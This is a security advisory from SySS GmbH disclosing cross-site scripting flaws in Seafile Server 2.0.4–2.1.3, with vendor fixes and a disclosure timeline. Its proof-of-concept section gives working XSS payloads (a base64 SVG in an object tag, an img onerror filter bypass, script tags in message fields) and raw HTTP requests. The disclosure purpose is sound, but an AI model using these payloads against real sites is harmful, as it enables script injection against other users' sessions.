Advisory - Seafile Server Community

Advisory Seafile Server Community Edition

Advisory ID:	SYSS-2013-002
Product:	Seafile Server Community Edition
Vendor:	Seafile Ltd.
Affected Version(s):	2.0.4 Linux, 2.1.2 Linux, 2.1.3 Linux
Tested Version(s):	2.0.4 Linux, 2.1.2 Linux, 2.1.3 Linux
Vulnerability Type:	Cross-Site Scripting
Risk Level:	High
Solution Status:	Solved
Vendor Notification:	2013-12-16
Solution Date:	2014-01-23
Public Disclosure:	2014-01-23
CVE Reference:	Not assigned
Author of Advisory:	Marcel Mangold, SySS GmbH, www.syss.de/advisories/
Document Date:	2013-01-23
Document Version:	v1.4

 

Overview

The software suffers from persistent and reflected cross-site scripting  vulnerabilities.

 

Vulnerability 

Persistent cross-site scripting is possible at least at the following places:

(1) The user wiki page allows any Java Script code to be entered in version 2.0.4. An attacker can use this to do persistent cross-site scripting.

In version 2.1.2 the cross-site scripting must be embedded as base64 into an object tag.

In version 2.1.3 spaces at the right place break the filter mechanism.

After commit 1d75bc079c15e30f6574272e25f1c7c7e5b87969 the issue has to be considered as fixed while validation still is performed as output validation on the client side.

(2) An attacker can send internal messages to others user of the application. The subject field of the messages is vulnerable for persistent cross-site scripting. This way an attacker can code have executed in the context of almost any user of the application. (Fixed in v.2.1.2)     

(3) The application displays .svg vector graphics that have been uploaded via the file upload function. This file type may contain Java Script code which is executed in a users browser when the file is being displayed. (Fixed in v.2.1.2)     

(4) An attacker can send internal messages to others user of the application.The receiver field is vulnerable for reflected cross-site scripting. This a is rather theoretical issue because xsrf token are used. (Fixed in v.2.1.3)

 

Proof of Concept (PoC):

(1) Enter the following Code into the wiki editor v 2.1.2:

<object data=data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3

ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9y

Zy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHN

zIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlN5U1MgWFNTIik7PC9zY3JpcHQ+PC9zdmc+

type=image/svg+xml></object>

Enter the following Code into the wiki editor v 2.1.3:

<img src=# onerror =alert("SySS_XSS")>

 

(2) 

Request:

+------------------------------------ |

POST /message/message_send/ HTTP/1.1 

Host: 127.0.0.1:8000 

User-Agent: Mozilla/5.0 

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 

Accept-Language: de | Accept-Encoding: gzip, deflate 

Referer: 127.0.0.1/user/1/msgs/&nbsp;

Cookie: csrftoken=vesdFHfKjk2IIu0sy8suwUzMOk066h1x; sessionid=[...] Connection: keep-alive | Content-Type: application/x-www-form-urlencoded

Content-Length: 150

csrfmiddlewaretoken=vesdFHfKjk2IIu0sy8suwUzMOk066h1x&mass_msg=<script>alert("SySS XSS")</script>&mass_email=victim%40sample.xy

+------------------------------------

Response:

+------------------------------------

[...]        

<div class="txt">    

<div class="msg-main">            

<div class="msg-hd w100 ovhd">                                        

<a class="author" href="/user/3/msgs/">seafile2</a>                      

<span class="time">vor 4 Sekunden</span>                

</div>                

<p class="msg-con"><script>alert("SySS XSS")</script></p>                                  <span class="say"></span>           </div>        </div>         </li>

 [...]

+------------------------------------

 

(4)

Request:

+------------------------------------

POST /message/message_send/?from=all HTTP/1.1

Host: 127.0.0.1:8000 User-Agent: Mozilla/5.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: de

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-CSRFToken: dAjlY2zLmP1SmdoneDzTBRG6XynhhAVk

X-Requested-With: XMLHttpRequest

Referer: 127.0.0.1/message/list/

Content-Length: 43

Cookie: csrftoken=dAjlY2zLmP1SmdoneDzTBRG6XynhhAVk; sessionid=zrqax[...]

Connection: keep-alive

Pragma: no-cache

Cache-Control: no-cache mass_msg=asdf&mass_email=<script>alert(1)<%2fscript>

 

Response:

+------------------------------------

HTTP/1.1 400 BAD REQUEST

Server: gunicorn/0.16.1

Date: Tue, 07 Jan 2014 14:47:01 GMT

Connection: close

Vary: Accept-Language, Cookie |Content-Type: application/json; charset=utf-8

Content-Language: de 

Content-Length: 130  

{"html": "", "error": ["Senden der Nachricht an <script>alert(1)</script> fehlgeschlagen, da der Benutzer nicht gefunden wurde."]}

 

Solution:

(1) Update to version 2.1.4 - vendor fixed the issue

(2) Update to version 2.1.2 - vendor fixed the issue

(3) Update to version 2.1.2 - vendor fixed the issue

(4) Update to version 2.1.3 - vendor fixed the issue

 

Disclosure Timeline:

2013-12-02 - Vulnerability discovered

2013-12-16 - Vulnerability reported to developer

2013-12-30 - Patches for issues (2) and (3) commited to github

2014-01-07 - Vulnerability status reported to developer

2014-01-08 - Patches for issues commited to github

2014-01-11 - Received email from developer that new version 2.1.3 came out with issues fixed

2014-01-13 - Verified issue (4) is fixed

2014-01-13 - Vulnerability status reported to developer

2014-01-14 - Patch fo issue (1) committed to github while validation is still done using output filtering on the client-side (commit 1d75bc079c15e30f6574272e25f1c7c7e5b87969)

2014-01-23 - Version 2.1.4 published - this update solves all issues mentioned in this document 

 

References:

[1] SySS GmbH, SYSS-2013-002 - www.syss.de/advisories/SYSS-2013-002 -  Persistent Cross-Site Scripting (XSS) in Seafile 2.0.4 Server

[2] SySS GmbH, SySS Responsible Disclosure Policy 

 

Credits:

Security vulnerability found by Responsible Hacker of the SySS GmbH

E-Mail: marcel.mangold@syss.de Public Key: www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Marcel_Mangold.asc

Key ID: AC15E5BE Key Fingerprint: E21C 69ED 9A64 7486 6EDD 5E29 4EFE B20B AC15 E5BE

 

Disclaimer:

The information provided in this security advisory is provided "as is" and without warranty of any kind. 

Details of this security advisory may be updated in order to provide as accurate information as possible.

The latest version of this security advisory is available on the SySS Web site [1].

 

Copyright:

Creative Commons - Attribution (by) - Version 3.0

URL: creativecommons.org/licenses/by/3.0/deed.en